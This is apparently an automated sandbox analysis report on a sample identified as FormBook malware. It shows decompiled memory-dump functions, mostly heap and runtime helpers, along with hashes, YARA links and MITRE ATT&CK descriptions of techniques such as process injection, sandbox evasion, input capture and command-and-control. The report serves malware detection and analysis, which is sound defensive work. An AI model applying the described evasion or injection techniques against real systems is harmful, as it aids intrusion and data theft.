Instruction Fuzzy Hash: 7CE0D832A41118FBEB35A6D99D05F5ABBACDB44B60F000159FD04D7160E960AD00C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 0466FF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0466FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x46311a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E047288F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04670050(_t14);
				}
			}

0x0466ff66
0x0466ff6b
0x00000000
0x0466ff8f
0x00000000
0x0466ff8f

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 558a80476cb30d9ef71d6d7c9435fae1978cb56bc475843e6bb1c03fb25b2386
Instruction ID: 1630d13a5150dd456a4e4fbe3678a8e666dacb1fea29a8af5c0575288000a122
Opcode Fuzzy Hash: 558a80476cb30d9ef71d6d7c9435fae1978cb56bc475843e6bb1c03fb25b2386
Instruction Fuzzy Hash: 09E0DFB02052449FE738DF51E140F253798AB62725F1A801DE00A4B201EE32F881C21A

Uniqueness

Uniqueness Score: -1.00%

Function 046E41E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E046E41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x47308f0);
				_t5 = E046AD08C(__ebx, __edi, __esi);
				if( *0x47487ec == 0) {
					E0466EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x47487ec == 0) {
						 *0x47487f0 = 0x47487ec;
						 *0x47487ec = 0x47487ec;
						 *0x47487e8 = 0x47487e4;
						 *0x47487e4 = 0x47487e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L046E4248();
				}
				return E046AD0D1(_t5);
			}

0x046e41e8
0x046e41ea
0x046e41ef
0x046e41fb
0x046e4206
0x046e420b
0x046e4216
0x046e421d
0x046e4222
0x046e422c
0x046e4231
0x046e4231
0x046e4236
0x046e423d
0x046e423d
0x046e4247

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63d779bde539a0bdfa7f34e68af70271db09135740230f35d4a62b98529ebb3a
Instruction ID: 5792fd0c187e5c684c7ac3fbbc6b526a37464005e941dd344ae350527d191bc4
Opcode Fuzzy Hash: 63d779bde539a0bdfa7f34e68af70271db09135740230f35d4a62b98529ebb3a
Instruction Fuzzy Hash: 9CF0F87C8517088EEB62FFE6A5247B83BE8E7D4216F02812B810086685E7386841CF06

Uniqueness

Uniqueness Score: -1.00%

Function 0470D380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0470D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0465E8B0(__ecx, _a4, 0xfff);
					L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0470d38a
0x0470d39b
0x0470d3b1
0x00000000
0x0470d3b6
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 59182a7995705cfd7c6966c808d64b4a38507194ea1b097b772de1c5dbd74292
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 54E08C31281204EBEB225E84CC00B69BB5A9B407A5F108035FE085A7A0D675BD91EAC8

Uniqueness

Uniqueness Score: -1.00%

Function 0468A185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0468A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x47467e4 >= 0xa) {
					if(_t5 < 0x4746800 || _t5 >= 0x4746900) {
						return L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04670010(0x47467e0, _t5);
				}
			}

0x0468a190
0x0468a1a6
0x0468a1c2
0x00000000
0x00000000
0x00000000
0x0468a192
0x0468a192
0x0468a19f
0x0468a19f

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebe50e5d90122c858c1401d3e9ad6bf8e791947af7e5afce29283cb33ba754cf
Instruction ID: 6aa9161d9867f95fd74a8db12d8d99deb2d07977e35f954f9f95b2bcde6f48f1
Opcode Fuzzy Hash: ebe50e5d90122c858c1401d3e9ad6bf8e791947af7e5afce29283cb33ba754cf
Instruction Fuzzy Hash: C7D0126116100056F61D7790A954B352356E7C5B1DF30491EE2465AA90FB6CF8D59118

Uniqueness

Uniqueness Score: -1.00%

Function 046816E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046816E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04681710(0x47467e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04674620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x046816e8
0x046816ef
0x046816f3
0x046816fe
0x00000000
0x04681700
0x0468170d
0x0468170d
0x046816f2
0x046816f2
0x046816f2
0x046816f2

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 249bd7d66bdcf40c5694d30da008bb0f635d332be7b72b1eaa31de7b5b50b46c
Instruction ID: a4ee293674740959cf5e5f65c5edd5f2be38e997298e156e8108798a90fc5e28
Opcode Fuzzy Hash: 249bd7d66bdcf40c5694d30da008bb0f635d332be7b72b1eaa31de7b5b50b46c
Instruction Fuzzy Hash: 3ED05E3120010092EA2D6A109854B542355AB91789F38016CB116599C0EFA4ECD3E44C

Uniqueness

Uniqueness Score: -1.00%

Function 046835A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046835A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0466EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x046835a1
0x046835a1
0x046835a5
0x046835ab
0x046835ab
0x046835b5
0x00000000
0x046835c1
0x046835b7

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: bd666abfadff49c64b282d9d8d021edf2eaf8c7c0fd76665fa894edc7fed3a92
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 7FD0A9315011809AEB01BB10C21876833B2BB00B08F58266D88020EB52F33B6E8AD706

Uniqueness

Uniqueness Score: -1.00%

Function 0466AAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0466AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x0466aab6
0x0466aabb
0x046ba442
0x00000000
0x046ba448
0x046ba454
0x046ba454
0x0466aac1
0x0466aac1
0x0466aac6
0x0466aac6

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: ac7970c90a8638fe3b8ca22986bdbd3e07e3e428d7452776b57376bf29d6ec67
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: DFD0E935352A80CFD726CF5DC554B5573A4BB55B44FC504A0E541CBB61E62CE984CA10

Uniqueness

Uniqueness Score: -1.00%

Function 046DA537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046DA537(intOrPtr _a4, intOrPtr _a8) {

				return L04678E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x046da553

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 91c7f1d16c08f4cd9d2298af34f0ffe64e7d62391bb3a4f703c28e195fc8ed69
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 4BC01232080248BBCB126F81CC00F067B2AEB94B60F108014BA080B5608632E970EA88

Uniqueness

Uniqueness Score: -1.00%

Function 0465DB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0465DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04674620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x0465db4d
0x0465db54
0x0465db5f
0x0465db56
0x0465db56
0x0465db5c
0x0465db5c

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 6007e71727af1f1649f4ec4199411e2a685188b4adea6fdf11662fbb7466a3a4
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 64C08C70380A00AAEB226F20CD01B0036A1BB10B05F4400A06700DA0F0FF78E801EA00

Uniqueness

Uniqueness Score: -1.00%

Function 0465AD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0465AD30(intOrPtr _a4) {

				return L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x0465ad49

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 06c0d86c92bb225d77b552481b47e7d08637948c1ade6e0b1db09959e748c15d
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 31C08C32080248BBC7126B45CD00F017B29E790B60F000020F6040A661C932F861D988

Uniqueness

Uniqueness Score: -1.00%

Function 04673A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04673A1C(intOrPtr _a4) {
				void* _t5;

				return L04674620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x04673a35

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 27e3ecd20d800eca6ef66999676ee1aa1a0247bba362fffa549b67fe6462f3d0
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: A9C08C32180248BBC712AE41DC00F017B29E790B60F000020B6040A5608932EC60D98C

Uniqueness

Uniqueness Score: -1.00%

Function 046676E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046676E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x046676e4
0x00000000
0x046676f8
0x046676fd

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 7ecbe718c9a778bcc8946be456a5ee018b25573126083fc854ae8f77a175b412
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: BFC08C702411805AEB2A6B08CE20B203651AB5870FF68019CAA02896A1E36CB803C608

Uniqueness

Uniqueness Score: -1.00%

Function 046836CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046836CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x046836d2
0x046836e8
0x046836d4
0x046836e5
0x046836e5

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: ddc5645cca2d70e669348c73ed0c7966f948ffad9e8393ccf3dafd70127e8d8b
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: DCC08C70250440EAE6156B208D40B147254A700A21F6403587220496E0E929BC40D504

Uniqueness

Uniqueness Score: -1.00%

Function 04677D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04677D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x04677d56
0x04677d5b
0x04677d60
0x04677d5d
0x04677d5d
0x04677d5d

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: f1157cd684c7a940a82b5eaba5a21be0bb413695201a24be5d319d6e82b4d22c
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 61B092343019408FCF16DF18C080B1533E4FB48A40B8440D1E400CBA20E229F8408900

Uniqueness

Uniqueness Score: -1.00%

Function 046EFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E046EFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0469CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E046E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E046E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x046efdda
0x046efde2
0x046efde5
0x046efdec
0x046efdfa
0x046efdff
0x046efe0a
0x046efe0f
0x046efe17
0x046efe1e
0x046efe19
0x046efe19
0x046efe19
0x046efe20
0x046efe21
0x046efe22
0x046efe25
0x046efe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 046EFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 046EFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 046EFE01

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 099d39c5a3733bd0750852992b1db1764fac66e14b174fda2de62cfaa7f0ecbe
Instruction ID: 2cfb9b070a5459e6673a7b1d718808be22e10ee07904379deb363b0271ee9a08
Opcode Fuzzy Hash: 099d39c5a3733bd0750852992b1db1764fac66e14b174fda2de62cfaa7f0ecbe
Instruction Fuzzy Hash: 96F0FC762001017FEB241A86DC05F337B9ADB84774F240358F614561D1F962FC3096F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 56460021473877.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

